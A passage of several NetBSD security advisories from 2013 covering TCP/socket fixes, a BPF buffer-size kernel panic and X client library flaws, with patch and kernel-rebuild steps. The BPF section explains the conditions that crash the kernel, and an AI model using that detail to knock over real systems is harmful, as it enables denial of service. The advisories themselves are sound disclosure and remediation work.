system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCHwith your architecture (from uname -m), and KERNCONFwith the name of your kernel configuration file. NEWVERSION with the CVS version of the fix Versions of src/sys/netinet/tcp_usrreq.c: Branch NEWVERSION --- HEAD1.168 netbsd-61.162.2.2 netbsd-6-1 1.162.2.1.6.1 netbsd-6-0 1.162.2.1.4.1 Versions of src/sys/kern/uipc_socket.c: Branch NEWVERSION --- HEAD1.220 netbsd-61.209.2.4 netbsd-6-1 1.209.2.2.2.2 netbsd-6-0 1.209.2.1.4.2 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -rNEWVERSION src/sys/netinet/tcp_usrreq.c # cvs update -rNEWVERSION src/sys/kern/uipc_socket.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Thanks to Brian Marcotte for finding the issues and Christos Zoulas and Michael van Elst for developing fixes. Revision History 2013-11-27 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2013-011.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2013, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2013-011.txt,v 1.2 2013/11/26 23:59:25 tonnerre Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAEBAgAGBQJSlTXnAAoJEAZJc6xMSnBuSH8P/RcYbDdKyoxomS0QZQCH7f3a ynbachoA6T7snbSSvMAbWha+A4m/UcTVMy7dZpxUmVipGl2Q/IIbQ030qX+V4KDR
NetBSD Security Advisory 2013-009: user settable small BPF buffer can cause a panic
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2013-009 = Topic: user settable small BPF buffer can cause a panic Version:NetBSD-current: source prior to Sept 10th, 2013 NetBSD 6.1: affected NetBSD 6.0: affected NetBSD 5.1: affected NetBSD 5.2: affected Severity: Local DoS Fixed: NetBSD-current: Sept 9th, 2013 NetBSD-6-0 branch: Sept 11th, 2013 NetBSD-6-1 branch: Sept 11th, 2013 NetBSD-6 branch:Sept 11th, 2013 NetBSD-5-1 branch: Sept 11th, 2013 NetBSD-5-2 branch: Sept 11th, 2013 NetBSD-5 branch:Sept 11th, 2013 Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Setting the bpf buffer size manually to be less than the required number of bytes to store the bpf header will crash the system. Technical Details = On NetBSD with 64-bit bpf_timeval, the minimum allowed BPF buffer size is the same size as the size of struct bpf_hdr. When BPF reports a packet, it will add the link-layer-type header and the bpf_hdr to the buffer it was supplied, and then add captured data in the remaining bytes. Setting the buffer size via ioctl BIOCSBLEN checks against BPF_MINBUFSIZE, but this test is not adequate since it does not include the size of the link layer header. As the link layer header size can change, no check there would be adequate. When calculating the size left for captured data (buffer size minus the sum of the size of the two headers) it may thus get a negative size. It will proceed to use this length e.g. to copy data into the buffer, but the copying routine will use an unsigned variable for the size of the buffer to copy to, and thus get a very large number. When the copy routine copies captured data to the buffer, it will leave the bounds of the buffer, and a panic will result. Solutions and Workarounds = Workaround: /dev/bpf* usually can only be read by root. If you have not changed this default: avoid running bpf programs that try to use a buffer size smaller than 36 on ethernet and 120 on wifi. Fix: Install a kernel containing the fix. The fastest way to do that, if you are running or can run a standard kernel built as part of the NetBSD release process, is to obtain the corresponding kernel from the daily NetBSD autobuild output and install it on your system. You can obtain such kernels from http://nyftp.netbsd.org/pub/NetBSD-daily/ where they are sorted by NetBSD branch, date, and architecture. To fix a system running e.g. NetBSD 6.0 or the stable NetBSD 6.0 branch, the most appropriate kernel will be the netbsd-6-0 kernel. To fix a system running NetBSD-current, the HEAD kernel should be used. In all cases, a kernel from an autobuild dated newer than the fix date for the branch you are using must be used to fix the problem. If you cannot use the autobuilt kernels, then for all affected NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCHwith your architecture (from uname -m), and KERNCONFwith the name of your kernel configuration file. NEWVERSION with the CVS version of the fix Versions of src/sys/net/bpf.c: Branch NEWVERSION --- HEAD1.176 netbsd-61.168.2.1 netbsd-6-1 1.168.8.1 netbsd-6-0 1.168.6.1 netbsd-51.141.6.3 netbsd-5-2 1.141.6.2.2.1 netbsd-5-1 1.141.6.1.6.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -rNEWVERSION sys/net/bpf.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Thanks to Peter Bex, who found and analyzed the problem, and Christos Zoulas, who created the fix. Revision History 2013-09-11 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2013-009.txt.asc Information about NetBSD and NetBSD security can be found at
NetBSD Security Advisory 2013-007: Protocol handling issues in X Window System client libraries
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2013-007 = Topic: Protocol handling issues in X Window System client libraries Version:NetBSD-current: source prior to Jun 6th, 2013 NetBSD 6.1: affected NetBSD 6.0: affected NetBSD 5.1: affected NetBSD 5.2: affected Severity: Privilege Escalation Fixed: NetBSD-current: Jun 6th, 2013 NetBSD-6-0 branch: Jun 6th, 2013 NetBSD-6-1 branch: Jun 6th, 2013 NetBSD-6 branch:Jun 6th, 2013 NetBSD-5-2 branch: Jun 6th, 2013 NetBSD-5-1 branch: Jun 6th, 2013 NetBSD-5 branch:Jun 6th, 2013 Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract X Window System client libraries were trusting server input to be correct and non-malicious. In case of a client displaying to a server under different administration, that trust may be unfounded. This set of vulnerabilities has been assigned the following CVE ids: CVE-2013-1981 CVE-2013-1982 CVE-2013-1983 CVE-2013-1984 CVE-2013-1985 CVE-2013-2062 CVE-2013-1986 CVE-2013-1987 CVE-2013-1988 CVE-2013-2063 CVE-2013-1989 CVE-2013-1990 CVE-2013-1991 CVE-2013-1992 CVE-2013-2064 CVE-2013-1993 CVE-2013-1994 CVE-2013-1995 CVE-2013-1996 CVE-2013-1997 CVE-2013-1998 CVE-2013-2066 CVE-2013-1999 CVE-2013-2000 CVE-2013-2001 CVE-2013-2002 CVE-2013-1981 CVE-2013-2003 CVE-2013-2004 CVE-2013-2005 Technical Details = See http://www.x.org/wiki/Development/Security/Advisory-2013-05-23 for details. The bugs fall into 6 general areas: - Integer overflow errors in memory allocation. - Signed extension errors in memory allocation. - Buffer overflows due to unvalidated data. - Integer overflows in parsing user data. - Infinte recursion in user data. - Memory corruption due to uninitialised pointer use. Scenarios for the privilege escalation are an attacker displaying an s-bitted client (eg a xlock variant) on a malicious server under their control, or using e.g. one of the buffer overflow varieties to execute code as root. Solutions and Workarounds = Binary: Install a new xbase set. These can be found pre-compiled at http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-branch/datetimeZ/arch/binary/sets/xbase.tgz - From source: For NetBSD-current, update to version 2013-06-06 or newer. For NetBSD releases, update the following files to at least the version given: File Name netbsd-5-1 netbsd-5-2 netbsd-5 netbsd-6-0netbsd-6-1netbsd-6 = xsrc/external/mit/MesaLib/dist/src/glx/x11/XF86dri.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.1.4.11.1.1.1.6.11.1.1.1.2.1 xsrc/external/mit/libFS/dist/src/FSOpenServ.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.2.4.11.1.1.2.6.11.1.1.2.2.1 xsrc/external/mit/libX11/dist/modules/im/ximcp/imLcPrs.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.5.4.11.1.1.5.6.11.1.1.5.2.1 xsrc/external/mit/libX11/dist/modules/im/ximcp/imTrX.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.6.4.11.1.1.6.6.11.1.1.6.2.1 xsrc/external/mit/libX11/dist/src/AllCells.c 1.1.1.1.6.11.1.1.1.8.11.1.1.1.2.1 1.1.1.3.4.11.1.1.3.6.11.1.1.3.2.1 xsrc/external/mit/libX11/dist/src/Font.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.5.4.11.1.1.5.6.11.1.1.5.2.1 xsrc/external/mit/libX11/dist/src/FontInfo.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.4.4.11.1.1.4.6.11.1.1.4.2.1 xsrc/external/mit/libX11/dist/src/FontNames.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.4.4.11.1.1.4.6.11.1.1.4.2.1 xsrc/external/mit/libX11/dist/src/GetFPath.c 1.1.1.1.6.11.1.1.1.8.11.1.1.1.2.1 1.1.1.3.4.11.1.1.3.6.11.1.1.3.2.1 xsrc/external/mit/libX11/dist/src/GetImage.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.4.4.11.1.1.4.6.11.1.1.4.2.1 xsrc/external/mit/libX11/dist/src/GetMoEv.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.4.4.11.1.1.4.6.11.1.1.4.2.1 xsrc/external/mit/libX11/dist/src/GetPntMap.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.4.4.11.1.1.4.6.11.1.1.4.2.1 xsrc/external/mit/libX11/dist/src/GetProp.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.5.4.11.1.1.5.6.11.1.1.5.2.1 xsrc/external/mit/libX11/dist/src/LiHosts.c 1.1.1.1.2.1.2.11.1.1.1.2.1.4.11.1.1.1.2.2 1.1.1.4.4.11.1.1.4.6.11.1.1.4.2.1 xsrc/external/mit/libX11/dist/src/ListExt.c